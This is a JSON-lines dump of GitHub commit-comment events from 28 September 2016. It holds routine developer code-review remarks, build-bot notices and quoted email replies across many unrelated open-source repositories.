{"id":"4633109557","type":"CommitCommentEvent","actor":{"login":"ferndopolis"},"repo":{"name":"edvinasbartkus/react-native-braintree"},"payload":{"comment":{"id":19213828,"position":null,"line":null,"path":null,"commit_id":"db92112c79529708b7a2228f61fa0ec6fd7e61e5","created_at":"2016-09-28T20:14:51Z","updated_at":"2016-09-28T20:14:51Z","body":"can submit this feature to https://github.com/alanhhwong/react-native-braintree, I have test and works!\r\n\r\nI would recommend adding a version spec on the Braintree pod in the podspec \r\n```s.dependency 'Braintree', '~> 4.7'```\r\n"}},"created_at":"2016-09-28T20:14:51Z"}
{"id":"4633110990","type":"CommitCommentEvent","actor":{"login":"tahoang"},"repo":{"name":"esrgc/whatsUp"},"payload":{"comment":{"id":19213831,"position":18,"line":13,"path":"appDomain/model/event.js","commit_id":"73b7caa5c9cff2fc59c9a46cff662b9eb86b0173","created_at":"2016-09-28T20:15:07Z","updated_at":"2016-09-28T20:15:07Z","body":"@johntalbot1215 this is a populated field. You need to use ref"}},"created_at":"2016-09-28T20:15:07Z"}
{"id":"4633117907","type":"CommitCommentEvent","actor":{"login":"rameshkunwar"},"repo":{"name":"rameshkunwar/VideoRental"},"payload":{"comment":{"id":19213843,"position":null,"line":null,"path":null,"commit_id":"9e10ad141cca2c1f9b7d7d1a810aadb828b671f1","created_at":"2016-09-28T20:16:20Z","updated_at":"2016-09-28T20:16:20Z","body":"It's little misleading I wrote removing mdf file from app_data. I'm new to git, and I could see in .gitignore file that it ignored the database file *.mdf. Now i've it."}},"created_at":"2016-09-28T20:16:20Z"}
{"id":"4633118285","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":19213844,"position":null,"line":null,"path":null,"commit_id":"def96704e21cd8e90301547317ede25c354b434c","created_at":"2016-09-28T20:16:24Z","updated_at":"2016-09-28T20:16:24Z","body":"The following doc(s) have been deployed to the [ttrowellpa](https://ttrowellpa-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/drupal-module-updates](https://ttrowellpa-static-docs.pantheonsite.io/docs/drupal-module-updates)\n"}},"created_at":"2016-09-28T20:16:24Z"}
{"id":"4633119791","type":"CommitCommentEvent","actor":{"login":"DiegoNolan"},"repo":{"name":"reflex-frp/reflex-dom"},"payload":{"comment":{"id":19213849,"position":null,"line":null,"path":null,"commit_id":"9af728b18e1e51221218403ba71ae83068ec31f7","created_at":"2016-09-28T20:16:41Z","updated_at":"2016-09-28T20:16:41Z","body":"Whoops."}},"created_at":"2016-09-28T20:16:41Z"}
{"id":"4633124885","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19213862,"position":4,"line":44,"path":"src/main/java/agilepuppers/cleanwater/controller/RegisterScreen.java","commit_id":"6d4a1b1439b6bb628a38813b1b574175d5ab6541","created_at":"2016-09-28T20:17:38Z","updated_at":"2016-09-28T20:17:38Z","body":"thx"}},"created_at":"2016-09-28T20:17:38Z"}
{"id":"4633125409","type":"CommitCommentEvent","actor":{"login":"phanikishoreg"},"repo":{"name":"phanikishoreg/Composite"},"payload":{"comment":{"id":19213863,"position":4,"line":53,"path":"src/platform/i386/kernel.h","commit_id":"a2c62947e4cbc5ddb9f9611dfb2c2b3f81ca2520","created_at":"2016-09-28T20:17:43Z","updated_at":"2016-09-28T20:17:43Z","body":"Just went through the code and Yes, I think you're right. Exposing `ACPI` interface from `kernel.h` doesn't make sense, should move it. Perhaps this should also be part of the other comment you had about hardware specific mappings cleanup from vm code. I'll edit the Issue to include this too. "}},"created_at":"2016-09-28T20:17:43Z"}
{"id":"4633127486","type":"CommitCommentEvent","actor":{"login":"calda"},"repo":{"name":"Agile-Puppers/Clean-Water"},"payload":{"comment":{"id":19213865,"position":null,"line":null,"path":null,"commit_id":"18b9db6d7317d7f8b191639396e570b30dc0afe9","created_at":"2016-09-28T20:18:05Z","updated_at":"2016-09-28T20:18:05Z","body":"+1, good choice"}},"created_at":"2016-09-28T20:18:05Z"}
{"id":"4633131571","type":"CommitCommentEvent","actor":{"login":"xylographe"},"repo":{"name":"SubtitleEdit/subtitleedit"},"payload":{"comment":{"id":19213876,"position":null,"line":null,"path":null,"commit_id":"e0b49e8fc3a9757c3fe9017a1190937f5ef3cdc8","created_at":"2016-09-28T20:18:49Z","updated_at":"2016-09-28T20:18:49Z","body":"@niksedk Does branch [packages](https://github.com/SubtitleEdit/subtitleedit/tree/packages) do what you want?\r\n"}},"created_at":"2016-09-28T20:18:49Z"}
{"id":"4633133499","type":"CommitCommentEvent","actor":{"login":"Spikeone"},"repo":{"name":"Return-To-The-Roots/s25client"},"payload":{"comment":{"id":19213883,"position":null,"line":null,"path":null,"commit_id":"543ae82dcc0615b5aafe84afc349d172a1dab1a1","created_at":"2016-09-28T20:19:11Z","updated_at":"2016-09-28T20:19:11Z","body":"Still no idea how to react to a commit so thats the thumbs up :+1: "}},"created_at":"2016-09-28T20:19:11Z"}
{"id":"4633135510","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19213890,"position":18,"line":2350,"path":"src/game/Creature.cpp","commit_id":"86ea6ed1f312ccdc27eba14d95fd3ca8889aa892","created_at":"2016-09-28T20:19:33Z","updated_at":"2016-09-28T20:19:33Z","body":"You're right, I totally misread that part of your patch, will fix it asap. thank you for pointing, hope you're not too disappointed I didn't exactly go with your method but rather expanded on the existing one by Kartoffel/xfurry"}},"created_at":"2016-09-28T20:19:33Z"}
{"id":"4633148148","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Stuff"},"payload":{"comment":{"id":19213924,"position":null,"line":null,"path":null,"commit_id":"472fb5e0b73ef9c88d19bcbcfc0f0548c244114d","created_at":"2016-09-28T20:21:46Z","updated_at":"2016-09-28T20:21:46Z","body":"Cloud 9 has C++. I now have a legitimate reason."}},"created_at":"2016-09-28T20:21:46Z"}
{"id":"4633148916","type":"CommitCommentEvent","actor":{"login":"groll75"},"repo":{"name":"paysafegroup/neteller_rest_api_v1"},"payload":{"comment":{"id":19213927,"position":null,"line":null,"path":null,"commit_id":"c89c2953e9875ed1aee4d1d598c9db44a356b173","created_at":"2016-09-28T20:21:55Z","updated_at":"2016-09-28T20:21:55Z","body":"__API Description file syntax error on line 4605__: named type 'customer' is defined more than once (Autogenerated message from apiary.io)"}},"created_at":"2016-09-28T20:21:55Z"}
{"id":"4633152777","type":"CommitCommentEvent","actor":{"login":"mogoodrich"},"repo":{"name":"PIH/openmrs-module-mirebalais"},"payload":{"comment":{"id":19213937,"position":null,"line":null,"path":null,"commit_id":"a94a344789bf4cccffa4b2992124cbe4dfba7d23","created_at":"2016-09-28T20:22:36Z","updated_at":"2016-09-28T20:22:36Z","body":"@cioan just a reminder to push these translations up to Transifex if you haven't already, otherwise they will get blown away next time we pull changes down."}},"created_at":"2016-09-28T20:22:36Z"}
{"id":"4633160227","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"lucabrivio/Stockfish"},"payload":{"comment":{"id":19213958,"position":null,"line":null,"path":null,"commit_id":"583727970e83b7f08b52666edb99555fad8d02a1","created_at":"2016-09-28T20:23:57Z","updated_at":"2016-09-28T20:23:57Z","body":"I once tried something for Bishop and Center pawns\r\nhttp://tests.stockfishchess.org/tests/view/574087a20ebc59301a354fbf\r\nBut did not try very hard to find better weights."}},"created_at":"2016-09-28T20:23:57Z"}
{"id":"4633168956","type":"CommitCommentEvent","actor":{"login":"jpotts18"},"repo":{"name":"jpotts18/SwiftValidator"},"payload":{"comment":{"id":19213984,"position":null,"line":null,"path":null,"commit_id":"761df17e0439330d6b7a22b344865d131a82d8c9","created_at":"2016-09-28T20:25:32Z","updated_at":"2016-09-28T20:25:32Z","body":"@davepatterson I was hoping that it would but I think I need to try it again with out `xcode7.3`\r\n"}},"created_at":"2016-09-28T20:25:32Z"}
{"id":"4633174084","type":"CommitCommentEvent","actor":{"login":"rmmh"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":19214007,"position":4,"line":86,"path":"jenkins/bootstrap.py","commit_id":"3bd0c9b0632b207192cbc62a01e4394c15857194","created_at":"2016-09-28T20:26:26Z","updated_at":"2016-09-28T20:26:26Z","body":"Only do this if it's nonzero, otherwise it's boring."}},"created_at":"2016-09-28T20:26:26Z"}
{"id":"4633175109","type":"CommitCommentEvent","actor":{"login":"gpupo"},"repo":{"name":"thiagobodruk/python"},"payload":{"comment":{"id":19214013,"position":6,"line":25,"path":"biblia/biblia-xml.py","commit_id":"16b8e3a075f153806cb6ee123cc6ca10a64710fe","created_at":"2016-09-28T20:26:38Z","updated_at":"2016-09-28T20:26:38Z","body":"Tem a descrição do modo de uso deste crawler?  "}},"created_at":"2016-09-28T20:26:38Z"}
{"id":"4633175255","type":"CommitCommentEvent","actor":{"login":"budnyjj"},"repo":{"name":"Workgood/courses_python"},"payload":{"comment":{"id":19214016,"position":null,"line":null,"path":null,"commit_id":"9920f92a1fe354d52884c49fbb32144bf5b1389b","created_at":"2016-09-28T20:26:39Z","updated_at":"2016-09-28T20:26:39Z","body":"```python\r\nd = datetime.strptime(\"23.10\", \"%d.%m\")\r\n```\r\nhere date is an object of type date"}},"created_at":"2016-09-28T20:26:39Z"}
{"id":"4633176592","type":"CommitCommentEvent","actor":{"login":"jpotts18"},"repo":{"name":"jpotts18/SwiftValidator"},"payload":{"comment":{"id":19214020,"position":null,"line":null,"path":null,"commit_id":"761df17e0439330d6b7a22b344865d131a82d8c9","created_at":"2016-09-28T20:26:54Z","updated_at":"2016-09-28T20:26:54Z","body":"@davepatterson  As long as you can validate that is working locally and the tests are passing locally I don't mind pushing a new version of the build. "}},"created_at":"2016-09-28T20:26:54Z"}
{"id":"4633177717","type":"CommitCommentEvent","actor":{"login":"ui4j"},"repo":{"name":"effektif/effektif"},"payload":{"comment":{"id":19214023,"position":null,"line":null,"path":null,"commit_id":"deaeef9c09c867559601bf78e77a086d736ce5e0","created_at":"2016-09-28T20:27:05Z","updated_at":"2016-09-28T20:27:05Z","body":"Why? Could please share the details of this decision."}},"created_at":"2016-09-28T20:27:05Z"}
{"id":"4633180621","type":"CommitCommentEvent","actor":{"login":"JohannesHoppe"},"repo":{"name":"Angular2Buch/book-monkey2"},"payload":{"comment":{"id":19214032,"position":null,"line":null,"path":null,"commit_id":"ee2ccbcf26da873e33a32cbb8414718d8c1791b9","created_at":"2016-09-28T20:27:34Z","updated_at":"2016-09-28T20:27:34Z","body":"Ihr wollte Code ohne Bedeutung drin lassen? Schämt euch!\r\nHier der Satz fürs Buch:\r\n\r\n> Komponenten, welche durch den Router in ein Router-Outlet geladen werden, benötigen keinen Selektor. Dies ist bei der Komponente \"BookDetails\" der Fall. Wir können den Selektor daher entfernen, da er keine Funktion mehr hat."}},"created_at":"2016-09-28T20:27:34Z"}
{"id":"4633181966","type":"CommitCommentEvent","actor":{"login":"ackernaut"},"repo":{"name":"ParabolInc/action"},"payload":{"comment":{"id":19214040,"position":5,"line":109,"path":"src/universal/modules/userDashboard/components/UserActionList/UserActionListItem.js","commit_id":"bd1fe45b21d24f362bf139de1e5a199b8a0eef51","created_at":"2016-09-28T20:27:49Z","updated_at":"2016-09-28T20:27:49Z","body":"@mattkrick what’s the need here?"}},"created_at":"2016-09-28T20:27:49Z"}
{"id":"4633183076","type":"CommitCommentEvent","actor":{"login":"fafcrumb"},"repo":{"name":"unicef-polymer/etools-frontend-template"},"payload":{"comment":{"id":19214050,"position":57,"line":57,"path":"src/etools-app-config/etools-app-config.html","commit_id":"1038dd304d6196338fa085f6bd758ac900016341","created_at":"2016-09-28T20:28:01Z","updated_at":"2016-09-28T20:28:01Z","body":"I see you've also thought about the issue of multiple properties having the same endpoint. Which is tough. And I'm tempted to just say avoid it for now. For now, every property defined here can have it's own endpoint. \r\n\r\nSo I'm thinking best practice here with that in mind will be to have etools-data loop through these endpoints on first stamp, and have a flag on each endpoint you want loaded at first stamp:\r\n\r\n```\r\nvar endpoints = {\r\n    partners: {\r\n        url: '../../data/partners_small.json',\r\n        loadInitial: true,\r\n        exp: 8000\r\n    }\r\n}\r\n```\r\n\r\nAlso, like before, expiration time should be associated with endpoints."}},"created_at":"2016-09-28T20:28:01Z"}
{"id":"4633184107","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":19214053,"position":null,"line":null,"path":null,"commit_id":"12af4a7baa1db85ca35faf04fc7e7286c499b228","created_at":"2016-09-28T20:28:12Z","updated_at":"2016-09-28T20:28:12Z","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 282](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1260&buildTypeId=Xbim_XbimGeometry_XbimGeometry) outcome was **SUCCESS**\nSummary: Running Build time: 00:28:27"}},"created_at":"2016-09-28T20:28:12Z"}
{"id":"4633185887","type":"CommitCommentEvent","actor":{"login":"chantebryana"},"repo":{"name":"chantebryana/ThinkLikeProgrammer"},"payload":{"comment":{"id":19214061,"position":null,"line":null,"path":null,"commit_id":"de6a42f017dbf47b396fc88dcde1641fae4d1246","created_at":"2016-09-28T20:28:31Z","updated_at":"2016-09-28T20:28:31Z","body":"One other lesson from this whole mess is to declare and define variables as locally as possible.  Instill habits to avoid global variables (read: written at the beginning of program)."}},"created_at":"2016-09-28T20:28:31Z"}
{"id":"4633186452","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19214062,"position":null,"line":null,"path":null,"commit_id":"74059559a11ccf0dc634953a4dc89c2a4a3b087d","created_at":"2016-09-28T20:28:37Z","updated_at":"2016-09-28T20:28:37Z","body":"@yeputons "}},"created_at":"2016-09-28T20:28:37Z"}
{"id":"4633187073","type":"CommitCommentEvent","actor":{"login":"cioan"},"repo":{"name":"PIH/openmrs-module-mirebalais"},"payload":{"comment":{"id":19214066,"position":null,"line":null,"path":null,"commit_id":"a94a344789bf4cccffa4b2992124cbe4dfba7d23","created_at":"2016-09-28T20:28:43Z","updated_at":"2016-09-28T20:28:43Z","body":"those translations came from transifex. they were already translated in transifex but not pushed to github"}},"created_at":"2016-09-28T20:28:43Z"}
{"id":"4633187183","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19214067,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-28T20:28:45Z","updated_at":"2016-09-28T20:28:45Z","body":"What? that's strange. That's the database name."}},"created_at":"2016-09-28T20:28:45Z"}
{"id":"4633187251","type":"CommitCommentEvent","actor":{"login":"jeffkaufman"},"repo":{"name":"pagespeed/mod_pagespeed"},"payload":{"comment":{"id":19214068,"position":141,"line":204,"path":"pagespeed/system/redis_cache.cc","commit_id":"75fb7f5a261674c0107b25cd97f4d6f530e601e1","created_at":"2016-09-28T20:28:46Z","updated_at":"2016-09-28T20:28:46Z","body":"Done in 74059559a11ccf0dc634953a4dc89c2a4a3b087d"}},"created_at":"2016-09-28T20:28:46Z"}
{"id":"4633191804","type":"CommitCommentEvent","actor":{"login":"marcbachmann"},"repo":{"name":"upfrontIO/livingdocs-docker"},"payload":{"comment":{"id":19214072,"position":4,"line":15,"path":"deploy/docker-compose.yml","commit_id":"d62070cb2e8edb25456365af17dccfa466f517d4","created_at":"2016-09-28T20:29:37Z","updated_at":"2016-09-28T20:29:37Z","body":"This still works because `db__host: postgres` gets resolved to `postgres.services`. Or something like that."}},"created_at":"2016-09-28T20:29:37Z"}
{"id":"4633197753","type":"CommitCommentEvent","actor":{"login":"amlynarczyk"},"repo":{"name":"cpfair/tapiriik"},"payload":{"comment":{"id":19214092,"position":6,"line":642,"path":"tapiriik/services/GarminConnect/garminconnect.py","commit_id":"d89308435a88a754c4518f96908097cee38ee754","created_at":"2016-09-28T20:30:38Z","updated_at":"2016-09-28T20:30:38Z","body":"It might be a good idea to add some kind of max tries limit here."}},"created_at":"2016-09-28T20:30:38Z"}
{"id":"4633199152","type":"CommitCommentEvent","actor":{"login":"rrrene"},"repo":{"name":"rrrene/inch_ex"},"payload":{"comment":{"id":19214096,"position":27,"line":40,"path":"lib/inch_ex/reporter/remote.ex","commit_id":"81684ed22a404adea13e85105e2b3c5a4af3e463","created_at":"2016-09-28T20:30:54Z","updated_at":"2016-09-28T20:30:54Z","body":"InchEx checks for the Git branch on which it runs and Inch CI let's you choose the evaluated branches from a list in the UI (I tried to circle it in the screenshot below):\r\n\r\n![image](https://cloud.githubusercontent.com/assets/311914/18930764/b941b784-85c9-11e6-930d-60c4291fcea9.png)\r\n\r\nThe default branch on GitHub is also the default branch on Inch CI, but you can show evaluations and badges for any branch by appending e.g. `branch=develop` as query URL parameter."}},"created_at":"2016-09-28T20:30:54Z"}
{"id":"4633214139","type":"CommitCommentEvent","actor":{"login":"rdp"},"repo":{"name":"sdogruyol/kemal-mysql"},"payload":{"comment":{"id":19214145,"position":null,"line":null,"path":null,"commit_id":"6334104f5dc18ad0e67cd6e7e9a8a6b8099bdcdd","created_at":"2016-09-28T20:33:36Z","updated_at":"2016-09-28T20:33:36Z","body":"unfortunately the new repository doesn't seem to mention how to use its mysql bindings with kemal [?]"}},"created_at":"2016-09-28T20:33:36Z"}
{"id":"4633215712","type":"CommitCommentEvent","actor":{"login":"carpodaster"},"repo":{"name":"carpodaster/sounddrop"},"payload":{"comment":{"id":19214150,"position":4,"line":10,"path":"app/views/welcome/index.html.erb","commit_id":"a3be9c0c2eb70a6f61fa3f851b7cb0c71287b4e4","created_at":"2016-09-28T20:33:53Z","updated_at":"2016-09-28T20:33:53Z","body":"Debug leftover :)"}},"created_at":"2016-09-28T20:33:53Z"}
{"id":"4633217382","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19214156,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T20:34:11Z","updated_at":"2016-09-28T20:34:11Z","body":"ok - danke mal soweit"}},"created_at":"2016-09-28T20:34:11Z"}
{"id":"4633217469","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-wotlk"},"payload":{"comment":{"id":19214157,"position":18,"line":2350,"path":"src/game/Creature.cpp","commit_id":"86ea6ed1f312ccdc27eba14d95fd3ca8889aa892","created_at":"2016-09-28T20:34:11Z","updated_at":"2016-09-28T20:34:11Z","body":"_Why_ should this work without selectFlags by the way?"}},"created_at":"2016-09-28T20:34:11Z"}
{"id":"4633217613","type":"CommitCommentEvent","actor":{"login":"Phoenix616"},"repo":{"name":"Phoenix616/ChestShopNotifier"},"payload":{"comment":{"id":19214158,"position":null,"line":null,"path":null,"commit_id":"2330b2a6b417017036e86230de316d8f8b62182a","created_at":"2016-09-28T20:34:13Z","updated_at":"2016-09-28T20:34:13Z","body":"Wait that fixed issue #6, not #7"}},"created_at":"2016-09-28T20:34:13Z"}
{"id":"4633221986","type":"CommitCommentEvent","actor":{"login":"andrewrk"},"repo":{"name":"ofelas/zigtest"},"payload":{"comment":{"id":19214174,"position":210,"line":210,"path":"malloc/liballoc.zig","commit_id":"4d4cbbe597b25fd95e32ef1b414f2af26a81e0cc","created_at":"2016-09-28T20:35:00Z","updated_at":"2016-09-28T20:35:00Z","body":"This makes sense if you're trying to make it look like the original code and the original code looks like\r\n\r\n```c\r\nif (l_memRoot) {\r\n    // ....\r\n}\r\n```\r\n\r\nIf the original code looks instead like:\r\n\r\n```c\r\nif (!l_memRoot)\r\n    return;\r\n```\r\n\r\nThen you can do this in Zig to mirror it:\r\n\r\n```zig\r\nconst maj = l_memRoot ?? return;\r\n```"}},"created_at":"2016-09-28T20:35:00Z"}
{"id":"4633225344","type":"CommitCommentEvent","actor":{"login":"igoticecream"},"repo":{"name":"chuparCh0pper/Snorlax"},"payload":{"comment":{"id":19214193,"position":null,"line":null,"path":null,"commit_id":"ff79523bfc7d6e8d0b4105a40778c2c61638f190","created_at":"2016-09-28T20:35:34Z","updated_at":"2016-09-28T20:35:34Z","body":"Hello!\r\n\r\nI have successfully renamed pokemons names... Just to let you know I'm going to push this feature! (tomorrow or friday)"}},"created_at":"2016-09-28T20:35:34Z"}
{"id":"4633226417","type":"CommitCommentEvent","actor":{"login":"CheyneWilson"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":19214196,"position":null,"line":null,"path":null,"commit_id":"369fe329cc124248d32e05add6cf91d20b84e1de","created_at":"2016-09-28T20:35:45Z","updated_at":"2016-09-28T20:35:45Z","body":"I hadn't thought about killing the remote injectors as well with Ctrl +C..\nBut Ctrl+C will kill Gradle if in --no-daemon mode, and trigger any \nshutdown hooks.\nSo a shutdown hook could be used to kill the injectors too - though I \nwould need to test this technique further.\n\n\nOn 23/09/16 2:48 AM, RaGe wrote:\n>\n> I like the direction you're going in. Remote injectors and plugin \n> tests were on my TODO list. I didn't think about multiple test \n> configs, but it is a great idea.\n>\n> How do you plan to kill remote injectors from Ctrl+C?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/CheyneWilson/jmeter-gradle-plugin/commit/369fe329cc124248d32e05add6cf91d20b84e1de#commitcomment-19131474>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AC3bAZ3KvAouYVByRuj3kEYvI62vffAgks5qspUxgaJpZM4KD-0a>.\n>\n\n"}},"created_at":"2016-09-28T20:35:45Z"}
{"id":"4633228090","type":"CommitCommentEvent","actor":{"login":"srfarias"},"repo":{"name":"Nougat-Surnia/android_device_motorola_msm8916-common"},"payload":{"comment":{"id":19214201,"position":39,"line":302,"path":"audio/audio_effects.conf","commit_id":"f08573075c774457e11bc484df62cd7016eea5de","created_at":"2016-09-28T20:36:03Z","updated_at":"2016-09-28T20:36:03Z","body":"Not sure about that.."}},"created_at":"2016-09-28T20:36:03Z"}
{"id":"4633228117","type":"CommitCommentEvent","actor":{"login":"edvinasbartkus"},"repo":{"name":"edvinasbartkus/react-native-braintree"},"payload":{"comment":{"id":19214202,"position":null,"line":null,"path":null,"commit_id":"db92112c79529708b7a2228f61fa0ec6fd7e61e5","created_at":"2016-09-28T20:36:03Z","updated_at":"2016-09-28T20:36:03Z","body":"@ferndopolis I have ended up using react-native-braintree-xplat where I have pull-requested this feature. I prefer that cross-platform solutions :)\r\n\r\nhttps://github.com/kraffslol/react-native-braintree-xplat/pull/6"}},"created_at":"2016-09-28T20:36:03Z"}
{"id":"4633228687","type":"CommitCommentEvent","actor":{"login":"carlwoodhouse"},"repo":{"name":"carlwoodhouse/Orchard.Cw.Disqus"},"payload":{"comment":{"id":19214203,"position":null,"line":null,"path":null,"commit_id":"3e4144268050551fc8bb45f7ee5b854466f393da","created_at":"2016-09-28T20:36:09Z","updated_at":"2016-09-28T20:36:09Z","body":"fixes #7 "}},"created_at":"2016-09-28T20:36:09Z"}
{"id":"4633229631","type":"CommitCommentEvent","actor":{"login":"CheyneWilson"},"repo":{"name":"CheyneWilson/jmeter-gradle-plugin"},"payload":{"comment":{"id":19214206,"position":null,"line":null,"path":null,"commit_id":"ff42705d976939193d249a275dc1a0a6d53c7d6d","created_at":"2016-09-28T20:36:18Z","updated_at":"2016-09-28T20:36:18Z","body":"Cheers for the heads up. Best of luck, I hope it goes well.\n\n\nOn 23/09/16 2:49 AM, RaGe wrote:\n>\n> heads up: I'm doing a major refactor of jmReport to use Jmeter3.0's \n> dashboard instead of the current report templates.\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub \n> <https://github.com/CheyneWilson/jmeter-gradle-plugin/commit/ff42705d976939193d249a275dc1a0a6d53c7d6d#commitcomment-19131496>, \n> or mute the thread \n> <https://github.com/notifications/unsubscribe-auth/AC3bAVobRdvitPSnMcG1bytCMowLWHuUks5qspWJgaJpZM4KD-8r>.\n>\n\n"}},"created_at":"2016-09-28T20:36:18Z"}
{"id":"4633230357","type":"CommitCommentEvent","actor":{"login":"aleitner"},"repo":{"name":"bitpay/bitpay-c-keyutils"},"payload":{"comment":{"id":19214209,"position":null,"line":null,"path":null,"commit_id":"9c9da52b50fc754990670383e4d7a5cb749db97b","created_at":"2016-09-28T20:36:26Z","updated_at":"2016-09-28T20:36:26Z","body":"this was a bad idea"}},"created_at":"2016-09-28T20:36:26Z"}
{"id":"4633231201","type":"CommitCommentEvent","actor":{"login":"gbrady92"},"repo":{"name":"AaronKalair/teabot_endpoints"},"payload":{"comment":{"id":19214212,"position":9,"line":58,"path":"teabot_endpoints/endpoints.py","commit_id":"23ea15b32c384050c7cc4c21664db6eac8260847","created_at":"2016-09-28T20:36:34Z","updated_at":"2016-09-28T20:36:34Z","body":"Remove @here"}},"created_at":"2016-09-28T20:36:34Z"}
{"id":"4633236396","type":"CommitCommentEvent","actor":{"login":"NedScott"},"repo":{"name":"xbmc/xbmc"},"payload":{"comment":{"id":19214233,"position":186,"line":357,"path":"system/keymaps/keyboard.xml","commit_id":"9719da3ea8046d363f3ebf650368ce7ef0838ed3","created_at":"2016-09-28T20:37:31Z","updated_at":"2016-09-28T20:37:31Z","body":"good point. I will make a PR for alt + arrow."}},"created_at":"2016-09-28T20:37:31Z"}
{"id":"4633237176","type":"CommitCommentEvent","actor":{"login":"frederikfederspiel"},"repo":{"name":"peoples-fund/peoples-fund"},"payload":{"comment":{"id":19214237,"position":142,"line":145,"path":"docs/req-spec.md","commit_id":"fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab","created_at":"2016-09-28T20:37:40Z","updated_at":"2016-09-28T20:37:40Z","body":"Hmm, I'll have to give that a think. We could perhaps have like a\n\"life-long membership\" or \"honorary member thing\", where you just paid the\nannual fee and didn't have to donate monthly anymore if you wanted to stop.\nOr maybe we shouldn't, I'll think about it...\n\n... which brings me to say:\n\nThat we will need to have annual fees. There will have to be\n\"kontingenter\", which will be like 100 kr or 150 kr or so and then the\nmonthly donations on top. This is for legal reasons in terms of our members\nin Denmark being given a tax deduction for their donations to us and for us\nbeing eligible for Danish Development Aid support and/or another major fund\nin Denmark, not to mention tons of other funds. We will very much be valued\nby the amount of \"kontingentbetalende\" (annual fee paying) members, and\nthat has to be an annual fee, not just monthly donations.\n\nI'm sure that should be rather easy to do with stripe...?\n\n2016-09-28 21:07 GMT+02:00 Tord <notifications@github.com>:\n\n> Sorry to nitpick but if we want to see the \"History of one-time donations\n> visible for user\" (see above) we need to connect the donations made by\n> logged in users to their account. I will create a new requirement for\n> donations for non-members\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/peoples-fund/peoples-fund/commit/fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab#commitcomment-19212890>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACAukbcwnloKp6e8UVDBe3X0yZO9wn1pks5qursJgaJpZM4KJL2t>\n> .\n>\n"}},"created_at":"2016-09-28T20:37:40Z"}
{"id":"4633237660","type":"CommitCommentEvent","actor":{"login":"ukostas"},"repo":{"name":"ukostas/hello-world"},"payload":{"comment":{"id":19214239,"position":null,"line":null,"path":null,"commit_id":"c65e192bb6c94b738e26e35412b0bb1d4a5e12f3","created_at":"2016-09-28T20:37:45Z","updated_at":"2016-09-28T20:37:45Z","body":"that's cool"}},"created_at":"2016-09-28T20:37:45Z"}
{"id":"4633237831","type":"CommitCommentEvent","actor":{"login":"cybrann"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19214240,"position":null,"line":null,"path":null,"commit_id":"8bfd1d6afd3428159a0176fd3e91fc82f0624c9e","created_at":"2016-09-28T20:37:47Z","updated_at":"2016-09-28T20:37:47Z","body":"This has no connection with travis..."}},"created_at":"2016-09-28T20:37:47Z"}
{"id":"4633238787","type":"CommitCommentEvent","actor":{"login":"BlackHistoryMonthLY"},"repo":{"name":"BlackHistoryMonthLY/hello-world"},"payload":{"comment":{"id":19214244,"position":null,"line":null,"path":null,"commit_id":"edfef538013ef4077d5f06817a3332fdd20ac68d","created_at":"2016-09-28T20:37:58Z","updated_at":"2016-09-28T20:37:58Z","body":"I am hoping this is the section to put the Declaration of the END of Racism: dated September 20, 2016"}},"created_at":"2016-09-28T20:37:58Z"}
{"id":"4633242511","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19214262,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T20:38:37Z","updated_at":"2016-09-28T20:38:37Z","body":"iteration (evanweaver) - x86_64-MacOS-10.10-clang: OK (2381 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-97.26%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T20:38:37Z"}
